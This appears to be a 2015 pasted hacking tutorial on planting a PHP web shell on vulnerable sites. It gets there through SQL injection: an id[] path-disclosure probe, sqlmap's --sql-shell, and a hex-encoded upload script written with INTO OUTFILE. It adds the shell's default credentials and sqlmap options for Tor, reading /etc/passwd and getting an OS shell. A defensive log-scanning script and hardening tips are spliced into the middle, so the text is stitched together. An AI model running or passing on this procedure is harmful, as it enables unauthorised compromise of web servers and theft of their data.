Kyfx

Sqlmap shell hacking Tutorials with sqlmap commands :)

Apr 16th, 2015
what you need:
A PHP Shell
An upload script (optional, might work without)
sqlmap (optional, but makes it so much easier)

what is a shell?
Quote
Shell is a shell wrapped in a script. It's a tool you can use to execute arbitrary shell commands or browse the filesystem on your remote webserver. This replaces, to a degree, a normal telnet connection, and to a lesser degree an SSH connection.

You use it for administration and maintenance of your website, which is often much easier to do if you can work directly on the server. For example, you could use PHP Shell to unpack and move big files around. All the normal command line programs like ps, free, du, df, etc. can be used.

There are some limitations on what kind of programs you can run. It won't do any good if you start a graphical program like Firefox or even a console based one like vi. All programs have to be strictly command line programs, and they will have no chance of getting user input after they have been launched. They probably also have to terminate within 30 seconds, as this is the default time-limit imposed on all PHP scripts, to prevent them from running in an infinite loop. Your ISP may have set this time-limit to something else.

But you can rely on all the normal shell functionality, like pipes, output and input redirection, etc.
source

so let's start :)

1. After finding a vulnerable site you need to get Full Path Disclosure.
I will use the empty array exploit: add the brackets []
Code:
http://www.example.com/index.php?id[]=1
gives
Code:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/relax/public_html/index.php on line 59
now we have the path

2. now you need to convert your upload script to hex
Code:
<form enctype="multipart/form-data" action="upload.php" method="POST"><input name="uploadedfile" type="file"/><input type="submit" value="Upload File"/></form> <?php $target_path=basename($_FILES['uploadedfile']['name']);if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$target_path)){echo basename($_FILES['uploadedfile']['name'])." has been uploaded";}else{echo "Error!";}?>
becomes the hex string used in the select statement in step 3.

3. Now let's fire up sqlmap with a sql-shell and inject
Code:
python sqlmap.py --url=http://www.example.com/index.php?id=1 --sql-shell
let sqlmap do its magic and after a while you will get a sql-shell
Quote
[15:35:06] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5
[15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell>
now write
Code:
SELECT 0xYour_Hex_Code INTO OUTFILE "Full_Path+filename";
don't forget the 0x before your hex, so it should look like
Code:
select 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e
into outfile "/home/relax/public_html/upload.php";
After a few seconds you should get a confirmation whether it was successful or not

4. browse to http://www.example.com/upload.php and upload the php shell

5. browse to your php shell and login


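As a defender's example added here (not code from the original post), this Python checker runs over web server access-log lines and flags the three traces the procedure above leaves behind: the id[] path-disclosure probe, the INTO OUTFILE write, and the long 0x hex literal carrying the encoded upload script. The log lines, the client IP and the sqlmap User-Agent value are constructed samples.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format access-log lines (not real traffic) modelled
# on the requests this tutorial makes: a normal page hit, the id[] path-disclosure
# probe, and a sqlmap-driven SELECT ... INTO OUTFILE write carrying a hex literal.
SAMPLE_LOG = r"""
203.0.113.5 - - [16/Apr/2015:15:30:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [16/Apr/2015:15:30:07 +0000] "GET /index.php?id[]=1 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.5 - - [16/Apr/2015:15:35:06 +0000] "GET /index.php?id=1%20UNION%20SELECT%200x3c3f706870206563686f2031%20INTO%20OUTFILE%20%22/home/relax/public_html/upload.php%22--%20- HTTP/1.1" 200 812 "-" "sqlmap/1.0-dev"
""".strip().splitlines()

# Request line parser: client IP, timestamp, method, request target, status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule: (finding name, regex run over the URL-decoded request target).
RULES = [
    ("array-param probe (full path disclosure)", re.compile(r"[?&][^=&]+\[\]=")),
    ("SQL file write (INTO OUTFILE/DUMPFILE)", re.compile(r"\bINTO\s+(OUTFILE|DUMPFILE)\b", re.I)),
    ("long hex literal (encoded payload)", re.compile(r"\b0x[0-9a-fA-F]{16,}")),
]

def analyse_line(line):
    """Return (ip, decoded_target, [finding names]) or None if the line does not parse."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    # Decode once, and once more: double-encoded probes (%2520 etc.) only show
    # their keywords after the second pass, so both forms are tested.
    decoded = unquote_plus(m.group("path"))
    twice = unquote_plus(decoded)
    hits = [name for name, rx in RULES if rx.search(decoded) or rx.search(twice)]
    return m.group("ip"), decoded, hits

def scan(lines):
    """Return (ip, decoded_target, findings) for every line that matched a rule."""
    findings = []
    for line in lines:
        result = analyse_line(line)
        if result and result[2]:
            findings.append(result)
    return findings

if __name__ == "__main__":
    for ip, target, hits in scan(SAMPLE_LOG):
        print(f"{ip} {target}\n    -> {', '.join(hits)}")
```

Turning display_errors off in php.ini removes the path disclosure from step 1, and a restrictive secure_file_priv value, or not granting the FILE privilege to the web application's database user, blocks the INTO OUTFILE write in step 3.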
Info:
The username and password for the shell are cyber and gladiator, you can change this in the php file. This specific shell must be named cyb3r-sh3ll.php or it will not work.

Think about using a unique name for your upload file so you don't overwrite some existing file; if you change the name you also need to change the source.

Extra:
You don't need to use sqlmap, you can simply run the select statement in your browser, it requires a bit more work though.

A theory is that you can inject the full shell code directly instead of first writing the uploader; the problem is that this specific shell is 268kB, but maybe it works with a smaller shell.

sqlmap is a really powerful tool, you can do a shit load of stuff with it. Here are some options I find helpful:

-o                          turn on all optimization switches
--threads=1-10              number of threads (faster)
--dbms=mysql                back-end DBMS (faster)
--level=1-5                 more tests
--risk=1-3                  more tests
--tor-port=xxxx             connect through tor
--random-agent              random user agent
--file-read=/etc/passwd     read a local file from the remote machine
--file-write=/etc/passwd    write a file to the remote machine, must be used with --file-dest
--file-dest=/etc/passwd     where to write the --file-write file
--os-shell                  like the sql-shell but for system commands
--wizard                    for beginners
--check-waf                 check for WAF/IPS/IDS protection

there are many more, just check them out

The --file-read/write does not work most of the time, maybe I'm doing something wrong, that's why I use sql-shell to write files or do specific commands.

--os-shell is awesome, you can't write php code to disk though.